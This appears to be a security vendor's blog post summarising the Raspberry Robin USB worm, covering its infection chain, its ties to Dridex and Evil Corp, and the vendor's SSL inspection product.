Raspberry Robin: Worm that Spreads over External Storage Devices

Raspberry Robin (a.k.a. Worm.RaspberyRobin) started out as a low-profile threat that was often installed on external USB storage devices. It was first spotted in September 2021 and has since been found to be a breeding ground for more serious threats, as described in this Microsoft Security blog.

In the past 30 days, Raspberry Robin has triggered payload warnings on the devices of nearly 1,000 organizations. Post infection, it obtains its payload through msiexec.exe from QNAP cloud accounts, executes via rundll32.exe, and creates a command-and-control channel via TOR.

Since Raspberry Robin and the Dridex malware loader share many traits, it can be linked it to the Russian “Evil Corp” ransomware gang. In fact, IBM Security confirmed this while examining two dynamic link libraries (DLLs) deposited while being infected by Raspberry Robin and compared them to the Dridex malware loader affiliated with Evil Corp.

The U.S. Treasury sanctioned Evil Corp. in 2019 for building Dridex. It was found that the decoding algorithms between Raspberry Robin and it were similar, using arbitrary strings in the portable executables and having an intermediate loader code that decoded the last payload in a similar way. Plus, it also included similar anti-analysis code.

How A10 Networks Protects Against Malware and Raspberry Robin

Malware protection necessitates insights into encrypted traffic to prevent assaults at the network edge. A10 Networks Thunder® SSL Insight (SSLi®) provides TLS/SSL decryption and inspection to spot malware and other enciphered network traffic exploits.